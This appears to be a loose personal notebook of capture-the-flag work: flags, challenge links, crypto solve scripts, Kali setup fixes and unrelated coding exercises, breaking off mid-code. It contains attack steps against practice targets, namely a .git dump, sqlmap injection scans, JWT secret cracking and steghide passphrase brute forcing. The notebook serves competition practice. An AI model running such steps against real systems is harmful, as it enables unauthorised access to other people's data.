┌──(kali㉿kali)-[~] └─$ sudo apt install dirsearch Reading package lists... Done Building dependency tree... Done Reading state information... Done E: Unable to locate package dirsearch LoTuX{xXx0oORrR super_secret_pw super_secret_pw LoTuX{xXx0oORrR_s1e3pr0c} http://lotuxctf.com:20006/ githacker --url http://lotuxctf.com:20006/.git/ --output-folder result git reset --hard e9dea4d8d3c8b8b24bcb031649fc0421d330b762 http://saturn.picoctf.net:50531/ http://saturn.picoctf.net:62217/ `psql -h saturn.picoctf.net -p 61426 -U postgres pico` postgres picoCTF{L3arN_S0m3_5qL_t0d4Y_31fd14c0} ![69502_0](https://hackmd.io/_uploads/ryNaO52xC.jpg) ![69503_0](https://hackmd.io/_uploads/B1N6O52eA.jpg) ![69501_0](https://hackmd.io/_uploads/ByVpd93lA.jpg) https://1drv.ms/f/s!Am_dLlD2CRUbgdwaQoqE_YCTmnyhQg?e=dXVLip https://play.picoctf.org/practice/challenge/115?category=4&page=1 cvpbPGS{c33xno00_1_f33_h_qrnqorrs} ```python import requests import hashlib from datetime import datetime, timezone username = "flagholder" timestamp = '2022-12-26 20:59:48.231534' dt = datetime.fromisoformat(timestamp)#.replace(tzinfo=timezone.utc) sec = int(dt.timestamp()) usec = dt.microsecond print(sec, usec) url = 'http://challenge-190c8382bf9b0e7f.sandbox.ctfhub.com:10800/submission.php?hash=' def get_hash(sec, usec): user_id = f"{username}_{sec:08x}{usec:05x}" return hashlib.sha1(user_id.encode()).hexdigest() for i in range(0, 1000): hash = get_hash(sec, usec - i) r = requests.get(url + hash) print(i, hash) if r.text != "Submission not found.": print("Found hash:", hash) print(r.text) break ``` https://github.com/maple3142/My-CTF-Challenges.git file: https://drive.google.com/file/d/1G-VtgJFEKcfN0Xj_wRZLLfXuoxPvR3tM/view?usp=sharing https://docs.docker.com/engine/install/ubuntu/ https://drive.google.com/file/d/1mnng4xunujuw5jCK1udhEmD5fTFkdbdi/view?usp=sharing Attaching to managementsystem_chal_1 └─$ python3 chall.py Traceback (most recent call last): File "/home/kali/Documents/My-CTF-Challenges/AIS3 Pre-exam 2023/ECC/chall.py", line 1, in <module> from fastecdsa.curve import secp256k1 ModuleNotFoundError: No module named 'fastecdsa' ```python= import ast import string from collections import Counter from fastecdsa.curve import secp256k1 from fastecdsa.point import Point from fastecdsa.util import mod_sqrt def lift_x(x, curve): y_squared = (x * x * x + curve.a * x + curve.b) % curve.p y1, y2 = mod_sqrt(y_squared, curve.p) R1, R2 = Point(x, y1, curve=curve), Point(x, y2, curve=curve) return R1, R2 p = secp256k1.p ciphertext = ast.literal_eval(open("output.txt").read()) c1s = [c1 for c1, _, _ in ciphertext] for k0P in lift_x(pow(ord("A"), -1, p) * c1s[0] % p, secp256k1): for k1P in lift_x(pow(ord("I"), -1, p) * c1s[1] % p, secp256k1): dP = k1P - k0P k2P_cand = k1P + dP if pow(k2P_cand.x, -1, p) * c1s[2] % p < 256: break s = k0P for c in c1s: print(chr(pow(s.x, -1, p) * c % p), end="") s += dP ``` https://drive.google.com/file/d/1cczdP1CntYpbMrU5kD_mf3_Gv3DNYTQe/view?usp=sharing 確認有安裝後,發現還是無法複製貼上 原因是我們沒有在虛擬機裡面安裝套件 此時輸入 sudo apt insatll open-vm-tools ![](https://miro.medium.com/v2/resize:fit:952/1*oEAq6CyocxAo7ROIraoc2w.png) 再輸入 sudo apt install open-vm-tools-desktop ![](https://miro.medium.com/v2/resize:fit:958/1*KpVHKWscZt9XcmcOLb0S7g.png) 都安裝完成後,就可以進行虛擬機與本機間的複製貼上囉~ https://hackmd.io/@M3t30r/Bk4n4dkIn#Reverse http://challenge-886c8d53738e2b28.sandbox.ctfhub.com:10800 └─$ sudo docker-compose up sudo: docker-compose: command not found sudo curl -L "https://github.com/docker/compose/releases/download/{docker-compose_version}/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose starbugs sudo curl -L "[https://github.com/docker/compose/releases/latest/download/docker-compose-$](https://github.com/docker/compose/releases/latest/download/docker-compose-$)(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose `sudo curl -L "https://github.com/docker/compose/releases/download/1.27.3/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose` sudo chmod +x /usr/local/bin/docker-compose ```bash sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose ``` ``` ┌──(kali㉿kali)-[~/Documents/My-CTF-Challenges/AIS3 Pre-exam 2023/Login Panel-release] └─$ sudo docker-compose up Traceback (most recent call last): File "urllib3/connectionpool.py", line 677, in urlopen File "urllib3/connectionpool.py", line 392, in _make_request File "http/client.py", line 1252, in request File "http/client.py", line 1298, in _send_request File "http/client.py", line 1247, in endheaders File "http/client.py", line 1026, in _send_output File "http/client.py", line 966, in send File "docker/transport/unixconn.py", line 43, in connect FileNotFoundError: [Errno 2] No such file or directory During handling of the above exception, another exception occurred: Traceback (most recent call last): File "requests/adapters.py", line 449, in send File "urllib3/connectionpool.py", line 727, in urlopen File "urllib3/util/retry.py", line 403, in increment File "urllib3/packages/six.py", line 734, in reraise File "urllib3/connectionpool.py", line 677, in urlopen File "urllib3/connectionpool.py", line 392, in _make_request File "http/client.py", line 1252, in request File "http/client.py", line 1298, in _send_request File "http/client.py", line 1247, in endheaders File "http/client.py", line 1026, in _send_output File "http/client.py", line 966, in send File "docker/transport/unixconn.py", line 43, in connect urllib3.exceptions.ProtocolError: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory')) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "docker/api/client.py", line 205, in _retrieve_server_version File "docker/api/daemon.py", line 181, in version File "docker/utils/decorators.py", line 46, in inner File "docker/api/client.py", line 228, in _get File "requests/sessions.py", line 543, in get File "requests/sessions.py", line 530, in request File "requests/sessions.py", line 643, in send File "requests/adapters.py", line 498, in send requests.exceptions.ConnectionError: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory')) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "bin/docker-compose", line 3, in <module> File "compose/cli/main.py", line 67, in main File "compose/cli/main.py", line 123, in perform_command File "compose/cli/command.py", line 69, in project_from_options File "compose/cli/command.py", line 132, in get_project File "compose/cli/docker_client.py", line 43, in get_client File "compose/cli/docker_client.py", line 170, in docker_client File "docker/api/client.py", line 188, in __init__ File "docker/api/client.py", line 213, in _retrieve_server_version docker.errors.DockerException: Error while fetching server API version: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory')) [3361] Failed to execute script docker-compose ``` egrep -c '(vmx|svm)' /proc/cpuinfo a=[83,116,113,96,112,99,125,78,87,103,57,110,104,82,102,106,113,32,123,125,115,104] b='' for i in range(len(a)): b += chr(a[i]^i) print (b) a=[83,116,113,96,112,99,125,78,87,103,57,110,104,82,102,106,113,32,123,125,115,104] b='' for i in range(len(a)): b += chr(a[i]^i) print (b) Susctf{I_n3ed_hea1ing} http://82.157.146.43:16820/ http://82.157.146.43:16962/ shellmates{7HE\_w3B\_is_w31RD} https://ctf.bugku.com/challenges/detail/id/419.html nc 82.157.146.43 15605 git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbinit https://reurl.cc/136VmG ``` flag=open("flag","rb").read() from Crypto.Util.number import getPrime,bytes_to_long p=getPrime(1024) q=getPrime(1024) e=65537 n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,e,n p=getPrime(1024) e=65537 n=p*q m=bytes_to_long("1"*32) c=pow(m,e,n) print c,e,n ''' output: 2482083893746618248544426737023750400124543452082436334398504986023501710639402060949106693279462896968839029712099336235976221571564642900240827774719199533124053953157919850838214021934907480633441577316263853011232518392904983028052155862154264401108124968404098823946691811798952747194237290581323868666637357604693015079007555594974245559555518819140844020498487432684946922741232053249894575417796067090655122702306134848220257943297645461477488086804856018323986796999103385565540496534422406390355987976815450744535949785073009043007159496929187184338592859040917546122343981520508220332785862546608841127597 65537 14967030059975114950295399874185047053736587880127990542035765201425779342430662517765063258784685868107066789475747180244711352646469776732938544641583842313791872986357504462184924075227433498631423289187988351475666785190854210389587594975456064984611990461126684301086241532915267311675164190213474245311019623654865937851653532870965423474555348239858021551589650169602439423841160698793338115204238140085738680883313433574060243600028500600824624358473403059597593891412179399165813622512901263380299561019624741488779367019389775786547292065352885007224239581776975892385364446446185642939137287519945974807727 3829060039572042737496679186881067950328956133163629908872348108160129550437697677150599483923925798224328175594483217938833520220087230303470138525970468915511111320396185482564783975435346354440035776909781158407636044986403819840648379609630039348895415045723208843631191252142600667607807479954194447237061080618370787672720344741413537975922184859333432197766580150534457001196765621678659952108010596273244230812327182786329760844037149719587269632133595149294067490955644893402708720284179715002149224068928828656515326446881791228638008572889331511945042911372915003805505412099102954073299010951896955362470 65537 14624662628725820618622370803948630854094687814338334827462870357582795291844925274690253604919535785934208081825425541536057550227048399837243392490762167733083030368221240764693694321150104306044125934201699430146970466657410999261630825931178731857267599750324918610790098952520113593130245010530961350592735239454337631927669542026935873535964487595433984902529960726655481696404006628917922241666148082741874033756970724357470539589848548704573091633917869387239324447730587545472564561496724882799495186768858324490838169123077051890332313671220385830444331578674338014080959653201802476516237464651809255679979 ''' http://atlas.picoctf.net:59692/ ``` @CTF Player 比賽即將於兩天後開始,時間為2024/04/27 08:00 ~ 2024/04/28 20:00,各位可以先到平台註冊,本次題目平台共分為兩個 1.一般資格平台:所有人都可以參與,平台可直接註冊 https://ctf-hobby.scint.org/ 2.領獎資格平台:使用我們寄給您的帳號及密碼,於該平台解題才給予獎品 https://ctf.scint.org/ http://23.146.248.36:10001/ https://blog.csdn.net/Blood_Seeker/article/details/81837571 ``` #bruteStegHide.sh #!/bin/bash for line in `cat $2`;do steghide extract -sf $1 -p $line > /dev/null 2>&1 if [[ $? -eq 0 ]];then echo 'password is: '$line exit fi done ``` ``` # -*- coding: utf8 -*- #author:pcat #http://pcat.cnblogs.com from subprocess import * def foo(): stegoFile='rose.jpg' extractFile='hide.txt' passFile='english.dic' errors=['could not extract','steghide --help','Syntax error'] cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"' f=open(passFile,'r') for line in f.readlines(): cmd=cmdFormat %(stegoFile,extractFile,line.strip()) p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT) content=unicode(p.stdout.read(),'gbk') for err in errors: if err in content: break else: print content, print 'the passphrase is %s' %(line.strip()) f.close() return if __name__ == '__main__': foo() print 'ok' pass ``` ``` # -*- coding: utf8 -*- # author: pcat # http://pcat.cnblogs.com from subprocess import Popen, PIPE, STDOUT def foo(): stegoFile = 'rose.jpg' extractFile = 'hide.txt' passFile = 'english.dic' errors = ['could not extract', 'steghide --help', 'Syntax error'] cmdFormat = 'steghide extract -sf "%s" -xf "%s" -p "%s"' with open(passFile, 'r') as f: for line in f: cmd = cmdFormat % (stegoFile, extractFile, line.strip()) p = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE) # Capture both stdout and stderr output, _ = p.communicate() # Wait for the process to complete and get output content = output.decode('utf-8', errors='ignore') # Decode output bytes to Unicode for err in errors: if err in content: break else: print(content) print('the passphrase is %s' % (line.strip())) return if __name__ == '__main__': foo() print('ok') ```潘志豪 C:\Users\mlsh\Desktop>node 123.js (node:7156) Warning: To load an ES module, set "type": "module" in the package.json or use the .mjs extension. (Use `node --trace-warnings ...` to show where the warning was created) C:\Users\mlsh\Desktop\123.js:1 import fetch from 'node-fetch'; ^^^^^^ SyntaxError: Cannot use import statement outside a module at internalCompileFunction (node:internal/vm:128:18) at wrapSafe (node:internal/modules/cjs/loader:1280:20) at Module._compile (node:internal/modules/cjs/loader:1332:27) at Module._extensions..js (node:internal/modules/cjs/loader:1427:10) at Module.load (node:internal/modules/cjs/loader:1206:32) at Module._load (node:internal/modules/cjs/loader:1022:12) at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:135:12) at node:internal/main/run_main_module:28:49 Node.js v20.12.2 node --experimental-modules 123.mjs ```json entry.2087702167: 1 entry.1046453724: entry.873445036: entry.1069330659: 是 entry.260776212: 是 entry.556240621: 是 entry.1367473080: 是 entry.713173595: 是 (鼓掌) entry.60765576: 是 entry.1256805579: 是 dlut: 1714466646625 hud: true entry.1069330659_sentinel: entry.260776212_sentinel: entry.556240621_sentinel: entry.1367473080_sentinel: entry.713173595_sentinel: entry.60765576_sentinel: entry.1256805579_sentinel: fvv: 1 partialResponse: [[[null,1535541969,["2"],0],[null,1247921748,["1"],0]],null,"-2246547900846118749"] pageHistory: 0,1 fbzx: -2246547900846118749 submissionTimestamp: 1714466650562 ``` 0x804932f ``` #include <iostream> using namespace std; int main() { int enc[] = {138, 80, 146, 200, 6, 61, 91, 149, 182, 82, 27, 53, 130, 90, 234, 248, 148, 40, 114, 221, 212, 93, 227, 41, 186, 88, 82, 168, 100, 53, 129, 172, 10, 100, 0}; for(int i = 0; i<35; i++){ enc[i]-=8; cout << (((enc[i]>>((i ^ 9) & 3)|enc[i]<<(8 - ((i ^ 9) & 3)))) & 255 ^i)<< " "; } } https://www.ezyzip.com/unzip-files-online.html ``` ```python= from Crypto.Util.number import * from Crypto.PublicKey import RSA import gmpy2 gmpy2.get_context().precision = 1024 def keygen(digits): count = 314159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848 assert(10**(digits-1) <= count < 10**digits) n = 23662270311503602529211462628663973377651035055221337186547659666520360329842954292759496973737109678655075242892199643594552737098393308599593056828393773327639809644570618472781338585802514939812387999523164606025662379300143159103239039862833152034195535186138249963826772564309026532268561022599227047 print('Lbound', count//3) print('Rbound', count//2) q_p = int(gmpy2.exp(gmpy2.log(count**2-n*4)/2)) assert(q_p**2 == count**2-n*4) q = (count + q_p) // 2 p = count - q assert(isPrime(p) and isPrime(q) and p*q == n) return p, q p, q = keygen(153) n = p*q e = 65537 d = inverse(e, (p-1)*(q-1)) c = 11458615427536252698065643586706850515055080432343893818398610010478579108516179388166781637371605857508073447120074461777733767824330662610330121174203247272860627922171793234818603728793293847713278049996058754527159158251083995933600335482394024095666411743953262490304176144151437205651312338816540536 print('m =', long_to_bytes(pow(c, d, n)).decode()) ``` https://isip-ctf.tyc4d.tw/challenges └─$ sqlmap -u http://isip-ctf.tyc4d.tw:8003/ ___ __H__ ___ ___[(]_____ ___ ___ {1.7.2#stable} |_ -| . ["] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 02:29:50 /2024-05-18/ [02:29:50] [INFO] testing connection to the target URL [02:29:51] [INFO] checking if the target is protected by some kind of WAF/IPS [02:29:51] [INFO] testing if the target URL content is stable [02:29:51] [INFO] target URL content is stable [02:29:51] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--forms --crawl=2' [02:29:51] [WARNING] your sqlmap version is outdated [*] ending @ 02:29:51 /2024-05-18/ ┌──(yih㉿kali)-[~] └─$ sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --dbms mysql --level 3 ___ __H__ ___ ___[,]_____ ___ ___ {1.7.2#stable} |_ -| . [(] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:10:12 /2024-05-18/ [03:10:13] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4441550f364...d6f137f352'). Do you want to use those [Y/n] y [03:10:15] [INFO] testing if the target URL content is stable [03:10:15] [INFO] target URL content is stable [03:10:15] [INFO] testing if parameter 'User-Agent' is dynamic [03:10:15] [WARNING] parameter 'User-Agent' does not appear to be dynamic [03:10:15] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable [03:10:15] [INFO] testing for SQL injection on parameter 'User-Agent' [03:10:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [03:10:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [03:10:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [03:10:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [03:10:16] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [03:10:16] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)' [03:10:16] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [03:10:16] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)' [03:10:16] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause' [03:10:17] [INFO] testing 'Generic inline queries' [03:10:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [03:10:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [03:10:17] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [03:10:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [03:10:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [03:10:18] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [03:10:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [03:10:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [03:10:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [03:10:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [03:10:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [03:10:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [03:10:20] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [03:10:20] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' [03:10:20] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' [03:10:20] [INFO] testing 'MySQL inline queries' [03:10:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [03:10:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [03:10:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [03:10:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [03:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' [03:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)' [03:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' [03:10:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind' [03:10:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' [03:10:22] [INFO] testing 'MySQL AND time-based blind (ELT)' [03:10:23] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace' [03:10:23] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' [03:10:23] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' [03:10:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [03:10:51] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns' [03:10:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [03:10:53] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [03:10:53] [WARNING] parameter 'User-Agent' does not seem to be injectable [03:10:53] [INFO] testing if parameter 'Referer' is dynamic [03:10:53] [WARNING] parameter 'Referer' does not appear to be dynamic [03:10:53] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable [03:10:53] [INFO] testing for SQL injection on parameter 'Referer' [03:10:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [03:10:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [03:10:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [03:10:54] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [03:10:54] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [03:10:54] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)' [03:10:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [03:10:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)' [03:10:54] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause' [03:10:55] [INFO] testing 'Generic inline queries' [03:10:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [03:10:55] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [03:10:55] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [03:10:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [03:10:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [03:10:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [03:10:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [03:10:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [03:10:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [03:10:57] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [03:10:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [03:10:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [03:10:58] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [03:10:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' [03:10:58] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' [03:10:58] [INFO] testing 'MySQL inline queries' [03:10:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [03:10:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [03:10:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [03:10:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [03:10:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' [03:10:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)' [03:10:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' [03:11:00] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind' [03:11:00] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' [03:11:00] [INFO] testing 'MySQL AND time-based blind (ELT)' [03:11:01] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace' [03:11:01] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' [03:11:01] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' [03:11:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [03:11:02] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns' [03:11:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [03:11:03] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [03:11:04] [WARNING] parameter 'Referer' does not seem to be injectable [03:11:04] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent' [03:11:04] [WARNING] your sqlmap version is outdated [*] ending @ 03:11:04 /2024-05-18/ └─$ sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --dbms mysql --level 3 AIS3{c143f9818a01_Ju5t_a_s1mple_fl4g_ch3ck3r_r1gh7?} ```python import cv2 import numpy as np import threading import time net = cv2.dnn.readNet('yolov4.weights', 'yolov4.cfg') net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA) net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA_FP16) # FP16 precision with open('coco.names', 'r') as f: classes = [line.strip() for line in f.readlines()] cap = cv2.VideoCapture(0) confidence_threshold, nms_threshold = 0.1, 0.4 layer_names = net.getLayerNames() output_layers = [layer_names[i - 1] for i in net.getUnconnectedOutLayers()] frame = None def capture_frames(): global frame while True: ret, frame = cap.read() if not ret: break capture_thread = threading.Thread(target=capture_frames) capture_thread.start() prev_time = time.time() while True: if frame is None: continue start_time = time.time() height, width, _ = frame.shape blob = cv2.dnn.blobFromImage(frame, 0.00392, (64, 64), swapRB=True) net.setInput(blob) outs = net.forward(output_layers) class_ids, confidences, boxes = [], [], [] for out in outs: for detection in out: scores = detection[5:] class_id = np.argmax(scores) confidence = scores[class_id] if confidence > confidence_threshold and classes[class_id] == 'person': center_x, center_y = int(detection[0] * width), int(detection[1] * height) w, h = int(detection[2] * width), int(detection[3] * height) x, y = int(center_x - w / 2), int(center_y - h / 2) boxes.append([x, y, w, h]) confidences.append(float(confidence)) class_ids.append(class_id) indexes = cv2.dnn.NMSBoxes(boxes, confidences, confidence_threshold, nms_threshold) num_people_detected = len(indexes) for i in indexes.flatten(): x, y, w, h = boxes[i] label = str(classes[class_ids[i]]) cv2.rectangle(frame, (x, y), (x + w, y + h), (0,0,0), 2) cv2.putText(frame, label, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,0), 1) end_time = time.time() fps = 1 / (end_time - start_time) cv2.putText(frame, "Detected people: {}".format(num_people_detected), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 2) cv2.putText(frame, "FPS: {:.2f}".format(fps), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 2) cv2.imshow('frame', frame) if cv2.waitKey(1) == ord('q'): break cap.release() cv2.destroyAllWindows() ``` .rodata:0000000000002080 key dd 3A011001h, 4C4C1B0Dh, 3A0B002Dh, 454F40h, 3104321Ah .rodata:0000000000002020 secret db 'FAKE',0Bh,0 ; DATA XREF: main+38↑o .rodata:0000000000002020 ; main+54↑o for ( i = 0; i <= 23; i += 2 ) { v4 = *(_DWORD *)&secret[4 * i] ^ key[*(unsigned int *)&secret[4 * i + 4]]; for ( j = 0; j <= 3; ++j ) { sleep(0x3674u); printf("%c", v4); v4 >>= 8; fflush(_bss_start); } } https://prod.liveshare.vsengsaas.visualstudio.com/join?E60E72F6540F95F805A44FDD6106D2759A65 jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfT.AJyZI_UBNuQwjYuEpP0rsuLhc -a 1234567890abcdefghijklmnopqrstuwxyz --max 8 jwt-cracker -t eyJhbGci0iJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjpmYWxzZX0.wCcmSnz9QshOZboVDlYEI2LjkSk_Su4CYoS7DLqgXnY -a abcdefghijklmnopqrstuwxyz --max jwt-cracker -t eyJhbGci0iJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjpmYWxzZX0.wCcmSnz9QshOZboVDlYEI2LjkSk_Su4CYoS7DLqgXnY ssh -R yih0118.serveo.net:80:localhost:5500 serveo.net https://1drv.ms/u/s!Am_dLlD2CRUbgfMIrAndkkYIuP00IA?e=Mlhird https://ctfd.tscctf.com/files/7793d37dec3912e018804e929cfc8b06/main.exe?token=eyJ1c2VyX2lkIjo3ODAsInRlYW1faWQiOm51bGwsImZpbGVfaWQiOjExfQ.Z4eM5w.7ov_vzqJEmp5p6pQreJ4VwFqmnM TSC{I_Think_you_Fix_2ome_3rror} https://ctfd.tscctf.com/files/9dd80380e6f50c0215678159805bee50/gate?token=eyJ1c2VyX2lkIjo3ODAsInRlYW1faWQiOm51bGwsImZpbGVfaWQiOjI1fQ.Z4eR5g.MasgXq-h6wfHSCZgP2AQHomITNI <!-- ![127732](https://hackmd.io/_uploads/rkKFnEX_yg.jpg) --> ![image](https://hackmd.io/_uploads/SJQtKf5Sxx.png) ``` #include <stdio.h> int main() { int n; scanf("%d", &n); for (int i = 0; i < n; i++) { int len = (i + 3 < n ? i + 3 : n); for (int j = 0; j < len; j++) { char ch = 'A' + (i + j) % n; putchar(ch); } putchar('\n'); } return 0; } ``` ![image](https://hackmd.io/_uploads/H1EZIQqreg.png) ``` #include <stdio.h> int main(void) { int n; int count[201] = {0}; // 身高範圍 0..200,初始化為 0 scanf("%d", &n); for (int i = 0; i < n; i++) { int 